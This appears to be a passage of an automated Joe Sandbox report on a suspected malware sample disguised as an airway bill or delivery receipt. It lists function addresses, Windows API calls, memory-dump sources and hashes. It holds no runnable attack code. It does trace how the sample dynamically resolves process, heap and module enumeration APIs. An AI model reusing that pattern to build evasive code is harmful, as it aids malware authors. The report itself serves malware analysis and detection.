                                                                                                    • Opcode Fuzzy Hash: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
                                                                                                    • Instruction Fuzzy Hash: 03C012A261033447FB219A9C9CC075562DCDB09295B1410E1E40CD7241E3609C044665
                                                                                                    Function 02B4BB48 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • timeSetEvent.WINMM(00002710,00000000,02B4BB3C,00000000,00000001), ref: 02B4BB58
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Eventtime
                                                                                                    • String ID:
                                                                                                    • API String ID: 2982266575-0
                                                                                                    • Opcode ID: ceed3d84f787894fee753d7bcb45271a28c025b12894e7e55ec63e83cb55bec4
                                                                                                    • Instruction ID: 0678d62ecf99d55b22af7294a893d186f0bb4728c2d96bc1e9ce993ecea10482
                                                                                                    • Opcode Fuzzy Hash: ceed3d84f787894fee753d7bcb45271a28c025b12894e7e55ec63e83cb55bec4
                                                                                                    • Instruction Fuzzy Hash: CEC092F2BC03403FFA10A6A81CC2F271A8DE704B00F602492BB04EE2C2D5E288645A60
                                                                                                    Function 02B24BE4 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02B24BEB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocString
                                                                                                    • String ID:
                                                                                                    • API String ID: 2525500382-0
                                                                                                    • Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                                                    • Instruction ID: a5f777c4dcdd36b3a317a1ed1576bb3681e6a149bbaab4bc5b821cc76ba6ac65
                                                                                                    • Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                                                    • Instruction Fuzzy Hash: F2B0923825832269EE1412610D04B3210AC8B50287F8500D1AE2CC8480EB00C0088832
                                                                                                    Function 02B24BFC Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02B24C03
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeString
                                                                                                    • String ID:
                                                                                                    • API String ID: 3341692771-0
                                                                                                    • Opcode ID: 4210c3dfb18652f6ec0b0b51d6fbd20cd1f444da7e88b25de82dc1dad3c2e2d3
                                                                                                    • Instruction ID: e651463e24f319c8827c7470e3241c4e437b8c0d113bdd894507220f4a01521c
                                                                                                    • Opcode Fuzzy Hash: 4210c3dfb18652f6ec0b0b51d6fbd20cd1f444da7e88b25de82dc1dad3c2e2d3
                                                                                                    • Instruction Fuzzy Hash: 0CA022AC0083330A8F0B232C000002A2033BFE03003CAE0E8200C0A000CF3A8008AC30
                                                                                                    Function 02B21682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02B22000), ref: 02B216A4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: ab99b24b78f9437852ee2238797199b8a2498a67ac7677a0514832296f9c264e
                                                                                                    • Instruction ID: 1d79b50b0c22cdc729b8ca095956cb85fbf158e4ba4bf49645a447c39a526727
                                                                                                    • Opcode Fuzzy Hash: ab99b24b78f9437852ee2238797199b8a2498a67ac7677a0514832296f9c264e
                                                                                                    • Instruction Fuzzy Hash: 33F090B6A407A56FD711AE5E9C80786BB94FB00394F054579F94CA7341D770A818CBD4
                                                                                                    Function 02B216E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02B21FE4), ref: 02B21704
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 1263568516-0
                                                                                                    • Opcode ID: 2ba00299611f45ea70e58ecbe8b5427f13dd596bc4de90e946b7b25736447433
                                                                                                    • Instruction ID: 6262fbca76cb8072c8e2e3ac14519ebcbf17b2491cee8cfd3457233760a87fc4
                                                                                                    • Opcode Fuzzy Hash: 2ba00299611f45ea70e58ecbe8b5427f13dd596bc4de90e946b7b25736447433
                                                                                                    • Instruction Fuzzy Hash: CBE086B53103216FE7105E7D5D407167BD8EB84654F1444B5F54DDB252D260E8188B60

                                                                                                    Non-executed Functions

                                                                                                    Function 02B3A954 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B3ABDB,?,?,02B3AC6D,00000000,02B3AD49), ref: 02B3A968
                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B3A980
                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B3A992
                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B3A9A4
                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B3A9B6
                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B3A9C8
                                                                                                    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B3A9DA
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B3A9EC
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B3A9FE
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B3AA10
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B3AA22
                                                                                                    • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B3AA34
                                                                                                    • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B3AA46
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B3AA58
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B3AA6A
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B3AA7C
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B3AA8E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                    • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                    • API String ID: 667068680-597814768
                                                                                                    • Opcode ID: d82fce0bec06be86fd5439931257e157665c278c4867a57417a96e3f3180894f
                                                                                                    • Instruction ID: 8b9c0a91e732243161c09d8a7148152fa5b14bcba0698a54c4a672503646aa77
                                                                                                    • Opcode Fuzzy Hash: d82fce0bec06be86fd5439931257e157665c278c4867a57417a96e3f3180894f
                                                                                                    • Instruction Fuzzy Hash: 3931E7B0A91360AFEB12AFB8DC95AE637E9EB05740B1009E5F04ECF215E7749815CF91
                                                                                                    Function 02B258B4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,02B27330,02B20000,02B4D790), ref: 02B258D1
                                                                                                    • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02B258E8
                                                                                                    • lstrcpynA.KERNEL32(?,?,?), ref: 02B25918
                                                                                                    • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02B27330,02B20000,02B4D790), ref: 02B2597C
                                                                                                    • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02B27330,02B20000,02B4D790), ref: 02B259B2
                                                                                                    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02B27330,02B20000,02B4D790), ref: 02B259C5
                                                                                                    • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B27330,02B20000,02B4D790), ref: 02B259D7
                                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B27330,02B20000,02B4D790), ref: 02B259E3
                                                                                                    • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B27330,02B20000), ref: 02B25A17
                                                                                                    • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B27330), ref: 02B25A23
                                                                                                    • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02B25A45
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                    • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                    • API String ID: 3245196872-1565342463
                                                                                                    • Opcode ID: 872f257b6b04869d87247dd964f354147b7dffd4ccc2b38a04f8a74b8bb427a6
                                                                                                    • Instruction ID: ef19b5861f0a776c3709b57b8a60613d9e1f53b3104abb0afcf131cdb76060ab
                                                                                                    • Opcode Fuzzy Hash: 872f257b6b04869d87247dd964f354147b7dffd4ccc2b38a04f8a74b8bb427a6
                                                                                                    • Instruction Fuzzy Hash: 80415C71D00369AFDB20DAE8CC88ADEB3ADEB09310F4445E5A55DE7242D770DB488F50
                                                                                                    Function 02B25B84 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B25B94
                                                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B25BA1
                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B25BA7
                                                                                                    • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B25BD2
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25C19
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25C29
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25C51
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25C61
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B25C87
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B25C97
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                    • API String ID: 1599918012-2375825460
                                                                                                    • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                                                    • Instruction ID: 4e7c4795c87d4e92b067478b9e8efea4f613c2413f3a0341889c71a407bfe146
                                                                                                    • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                                                    • Instruction Fuzzy Hash: 723147B1E5033C6AEB35DAB89C45BEF77AD9B04380F4441E1A64CE6182E6749E8C8F50
                                                                                                    Function 02B27F52 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02B27F75
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DiskFreeSpace
                                                                                                    • String ID:
                                                                                                    • API String ID: 1705453755-0
                                                                                                    • Opcode ID: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
                                                                                                    • Instruction ID: 86d81e3383bfd5107e75066fa776f5b6d644b7628be5b0c381dc24be524bb113
                                                                                                    • Opcode Fuzzy Hash: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
                                                                                                    • Instruction Fuzzy Hash: E71100B5A00209AF9B04CF99C9809EFF7F9EFC8314B14C569A509EB254E6319A018B90
                                                                                                    Function 02B2A744 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A762
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 2299586839-0
                                                                                                    • Opcode ID: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                                                                                                    • Instruction ID: 35a3ec67dbf0fe8769cda405791b51436c037b8161daa7ddb537672a3e602f75
                                                                                                    • Opcode Fuzzy Hash: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                                                                                                    • Instruction Fuzzy Hash: 9FE0D83570032417D311A5685C809F6B36D9B5C310F0041FEBD4DC7391EDA09D484EE8
                                                                                                    Function 02B2B70C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetVersionExA.KERNEL32(?,02B4C106,00000000,02B4C11E), ref: 02B2B71A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Version
                                                                                                    • String ID:
                                                                                                    • API String ID: 1889659487-0
                                                                                                    • Opcode ID: 4189a973054fdabbd04d8bf6fde7435a292a0ad65bee57349382d14a855aa87f
                                                                                                    • Instruction ID: ecf8714acdbaaf4c9e509bd56a863722ef7d7c6f0ace28d3950ad161f215306c
                                                                                                    • Opcode Fuzzy Hash: 4189a973054fdabbd04d8bf6fde7435a292a0ad65bee57349382d14a855aa87f
                                                                                                    • Instruction Fuzzy Hash: 92F0DA78A443129FD350DF28D580F1577E5FB49B54F8089A9E89CC7390EB389418CF52
                                                                                                    Function 02B2A790 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02B2BDF2,00000000,02B2C00B,?,?,00000000,00000000), ref: 02B2A7A3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 2299586839-0
                                                                                                    • Opcode ID: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                                                                                                    • Instruction ID: 62a810153de6e0ef121c48807820436cf0107c596635a4854f344034414b8934
                                                                                                    • Opcode Fuzzy Hash: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                                                                                                    • Instruction Fuzzy Hash: 19D05EB630E3702AA220915A2D84DBBAAFCCBC57A1F0044BEF58CC6250D2008C0996F5
                                                                                                    Function 02B2918C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LocalTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 481472006-0
                                                                                                    • Opcode ID: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                                                                                                    • Instruction ID: 2172b8c1bf90d8fd47c673e84136d5d5999d84b6ffb7ec30655d161e2957ab61
                                                                                                    • Opcode Fuzzy Hash: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                                                                                                    • Instruction Fuzzy Hash: 8EA0121040483001854037180C0217531445900620FC40FC068FC503D0ED1D012440D3
                                                                                                    Function 02B4D596 Relevance: .2, Instructions: 213COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmpDownload File
